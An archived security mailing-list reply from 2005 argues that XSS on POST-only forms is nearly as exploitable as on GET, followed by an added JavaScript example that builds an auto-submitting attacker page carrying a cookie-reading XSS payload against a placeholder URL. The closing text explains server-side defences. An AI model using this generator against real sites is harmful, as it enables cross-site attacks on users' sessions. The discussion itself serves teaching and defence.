WebApp Sec mailing list archives
Re: GET and POST Methods Accepted
From: "Amit Klein (AKsecurity)" <aksecurity () hotpop com>
Date: Thu, 13 Oct 2005 10:57:33 +0200
On 12 Oct 2005 at 15:04, Welsh, Ed wrote:

> If the site will accept the GET method for form data and is vulnerable to XSS, the attack surface greatly increases over a site that is vulnerable to XSS but only accepts the POST method. POST is still attackable, but it becomes more complicated than simply emailing a link.

An attacker can email a link to his/her own website/page, and this specially crafted page can contain a form (with method=POST and action being the vulnerable URL) followed by a piece of Javascript that submits this form. So XSS on POST method URLs isn't much more complicated than XSS on GET URLs.

-Amit
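The attacker-hosted page Amit describes, as an added example that is not part of the original message: a generator for a page carrying a form with method=POST whose action is the vulnerable URL, followed by a script that submits it. The vulnerable URL (https://victim.example/search), the parameter names (q, submit) and the payload are assumptions made for the illustration.

```javascript
// Added example, not code from the original thread. Builds the attacker-hosted
// page described in the message: a hidden POST form targeting the vulnerable
// URL plus a script that auto-submits it when the victim's browser loads it.
// The target URL, field names and payload below are assumptions.

// HTML-escape a value so it can sit inside a double-quoted attribute without
// breaking the attacker's own page, whatever characters the payload contains.
function escapeHtmlAttr(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Returns a complete HTML document: one hidden <input> per field, a form whose
// action is the vulnerable URL, and a script that submits it immediately.
function buildAutoPostPage(action, fields) {
  const inputs = Object.entries(fields)
    .map(([name, value]) =>
      `    <input type="hidden" name="${escapeHtmlAttr(name)}" value="${escapeHtmlAttr(value)}">`)
    .join("\n");
  return [
    "<!DOCTYPE html>",
    "<html><body>",
    `  <form id="f" method="POST" action="${escapeHtmlAttr(action)}">`,
    inputs,
    "  </form>",
    "  <script>document.getElementById('f').submit();</script>",
    "</body></html>",
    "",
  ].join("\n");
}

// Reverse of escapeHtmlAttr (order matters: &amp; last). The browser performs
// this decoding before it form-encodes the field, so the raw payload is what
// reaches the vulnerable server.
function unescapeHtmlAttr(s) {
  return s
    .replace(/&quot;/g, '"')
    .replace(/&lt;/g, "<")
    .replace(/&gt;/g, ">")
    .replace(/&amp;/g, "&");
}

// The application/x-www-form-urlencoded body the victim's browser will POST.
function formBody(fields) {
  return new URLSearchParams(fields).toString();
}

// Constructed sample: a hypothetical POST-only search form that reflects `q`
// without output encoding. The payload is carried in the hidden input.
const VULNERABLE_URL = "https://victim.example/search"; // assumption
const XSS_PAYLOAD = "<script>alert(document.cookie)</script>";
const FIELDS = { q: XSS_PAYLOAD, submit: "Search" };

const attackerPage = buildAutoPostPage(VULNERABLE_URL, FIELDS);

if (typeof require !== "undefined" && require.main === module) {
  console.log(attackerPage);
  console.log("POST body the browser sends: " + formBody(FIELDS));
}
```

The attacker hosts the generated page and emails its link; when the victim opens it, the form submits with the victim's cookies and the POST lands on the vulnerable URL exactly as a crafted GET link would. Restricting the endpoint to POST therefore does not shrink the XSS exposure; output encoding on the server removes the XSS, and only an unpredictable per-session value the attacker cannot supply would block the cross-site submission itself.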
Current thread:
- GET and POST Methods Accepted Welsh, Ed (Oct 12)
- Re: GET and POST Methods Accepted Joe Teff (Oct 12)
- Re: GET and POST Methods Accepted christopher baus (Oct 12)
- Re: GET and POST Methods Accepted Stephen de Vries (Oct 13)
- Re: GET and POST Methods Accepted christopher baus (Oct 13)
- Re: GET and POST Methods Accepted Stephen de Vries (Oct 13)
- Re: GET and POST Methods Accepted Damien Watson (Oct 13)
- Re: GET and POST Methods Accepted Serg Belokamen (Oct 13)
- Re: GET and POST Methods Accepted Eoin Keary (Oct 13)
- Re: GET and POST Methods Accepted Amit Klein (AKsecurity) (Oct 13)
- Re: GET and POST Methods Accepted John GALLET (Oct 13)
- Re: GET and POST Methods Accepted Eoin Keary (Oct 13)
- Re: GET and POST Methods Accepted John GALLET (Oct 13)
- Re: GET and POST Methods Accepted Eoin Keary (Oct 13)
- Re: GET and POST Methods Accepted Paul Laudanski (Oct 18)
- <Possible follow-ups>
- RE: GET and POST Methods Accepted Derick Anderson (Oct 13)
- RE: GET and POST Methods Accepted christopher baus (Oct 13)
- RE: GET and POST Methods Accepted Joe Teff (Oct 13)
- RE: GET and POST Methods Accepted christopher baus (Oct 13)
- RE: GET and POST Methods Accepted Derick Anderson (Oct 14)